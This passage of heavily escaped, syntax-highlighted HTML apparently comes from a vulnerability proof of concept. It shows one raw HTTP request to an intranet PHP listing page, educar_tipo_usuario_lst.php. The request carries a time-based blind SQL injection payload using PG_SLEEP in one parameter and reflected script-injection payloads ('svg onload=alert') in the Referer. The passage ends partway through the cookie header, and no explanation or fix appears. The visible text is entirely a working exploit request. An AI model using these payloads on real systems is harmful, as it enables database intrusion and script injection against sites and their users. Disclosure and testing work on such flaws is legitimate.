&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-gdscript3&amp;#34; data-lang=&amp;#34;gdscript3&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;GET&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;intranet&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;educar_tipo_usuario_lst&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;php&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;?&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;busca&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;S&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;nm_tipo&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;%20AND&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;%208767%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;3D(SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;%208767%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;20FROM%20PG_SLEEP(10))%20OR%20&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;EgwO&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;%3D&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pMdZ&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;descricao&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;nivel&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;HTTP&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;1.1&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Host&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;localhost&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;User&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Agent&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Mozilla&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;5.0&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;X11&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Linux&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;x86_64&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;rv&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;128.0&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Gecko&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20100101&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Firefox&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;128.0&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Accept&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;html&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;application&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;xhtml&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&#43;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;xml&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;application&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;xml&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;q&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;0.9&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;*/*&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;q&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;0.8&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Accept&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Language&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;en&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;US&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;en&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;q&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;0.5&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Accept&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Encoding&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;gzip&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;deflate&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;br&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;zstd&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Connection&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;keep&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;alive&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Referer&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;http&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;//&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;localhost&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;intranet&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;educar_tipo_usuario_lst&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;php&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;?&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;busca&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;S&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;nm_tipo&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Csvg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&#43;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Dalert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2812&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;descricao&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Csvg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&#43;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Dalert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2812&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;nivel&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;grav&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;admin&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flexpages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;grav&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tabs&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;state&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;--&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f0e041eed24f87f2b6b02fd6924d0a08&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;languages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;e838602f51515c83bca06a8ae758ce52&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;security&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;b6676b27f5cdf6b6c22f8e18da4259a0&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;advanced&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span 